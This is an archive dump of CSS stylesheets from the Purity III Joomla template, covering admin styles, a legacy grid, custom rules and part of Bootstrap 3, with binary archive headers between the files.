.t3onoff label.on:after {
  right: 0%;
}
.t3onoff label.on.active:after {
  right: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-left-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-left-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools,
.window.view-fields .js-stools,
.window.view-items .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn,
.window.view-fields .js-stools .btn,
.window.view-items .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn,
.window.view-fields .js-stools .input-append .btn,
.window.view-items .js-stools .input-append .btn {
  border-right: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input,
.window.view-fields .js-stools input,
.window.view-items .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single,
.window.view-fields .js-stools-container-filters .chzn-container-single,
.window.view-items .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop,
.window.view-fields .js-stools-container-filters .chzn-drop,
.window.view-items .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label,
.window.view-fields table#moduleList td .label,
.window.view-items table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1),
.window.view-fields table#moduleList td:nth-child(1),
.window.view-items table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before,
.window.view-fields .icon-publish:before,
.window.view-items .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: right;
}
.button2-right,
.button2-right div {
  float: left;
}
.button2-left {
  margin: 5px 0 0 5px;
}
.button2-right {
  margin: 5px 5px 0 0;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: right;
  padding: 2px 10px;
  border-radius: 0;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-right: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-right: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-left: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}
body.modal-open .modal.hide {
  background-color: #fff;
  display: block !important;
  right: auto;
  left: auto;
  top: 0;
  bottom: auto;
  transform: translateY(50%);
  z-index: 1050;
}
body.modal-open .modal.hide .iframe {
  border: 1px solid #ddd;
}
.thumbnails-media .imgFolder span {
  line-height: 70px;
}
.j4 joomla-tab {
  margin-bottom: 20px;
}
.j40 joomla-tab-element {
  margin-bottom: 20px;
}
ul.chosen-results {
  clear: both;
}PKӜ�\�	�	purity_iii/css/legacy-grid.cssnu&1i�.row-flex {
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
}
.row-fluid {
  margin-right: -20px;
  margin-left: -20px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKӜ�\��HHpurity_iii/css/custom.cssnu�[���.leading-0  {
    /*margin-right: 40px;*/
    border: 1px solid #b30000;
    padding: 20px;
   /* background-image: url(../images/Background_megadanse.png);
    background-repeat: no-repeat;
    background-position: bottom right;
		background: url(../images/Background_megadanse2.png) no-repeat center;*/
	background: url(../images/Background_megadanse.png) no-repeat bottom right;

	}
/*.nav > li > .separator {
    color: #ffcccc;
    text-transform: uppercase;
	  position: relative;
  display: block;
  padding: 15px 0px;
  line-height:25px;
}
.nav .caret {
    border-top-color: #ffcccc;
	border-bottom-color: #ffcccc;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > li > span:before {
    background: #ffffff;
    bottom: 0;
    content: "";
    height: 2px;
    position: absolute;
    left: 0;
    width: 0;
    -webkit-transition: width 500ms;
    -o-transition: width 500ms;
    transition: width 500ms;
}*/PKӜ�\7�k�k�kpurity_iii/css/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: none;
  text-decoration: underline;
  text-decoration: underline dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    color: #000 !important;
    text-shadow: none !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #0077bb;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #00466e;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  color: #444444;
  word-break: break-all;
  word-wrap: break-word;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  padding-right: 20px;
  padding-left: 20px;
  margin-right: auto;
  margin-left: auto;
}
@media (min-width: 768px) {
  .container {
    width: 760px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 980px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1180px;
  }
}
.container-fluid {
  padding-right: 20px;
  padding-left: 20px;
  margin-right: auto;
  margin-left: auto;
}
.row {
  margin-right: -20px;
  margin-left: -20px;
}
.row-no-gutters {
  margin-right: 0;
  margin-left: 0;
}
.row-no-gutters [class*="col-"] {
  padding-right: 0;
  padding-left: 0;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
table col[class*="col-"] {
  position: static;
  display: table-column;
  float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  display: table-cell;
  float: none;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
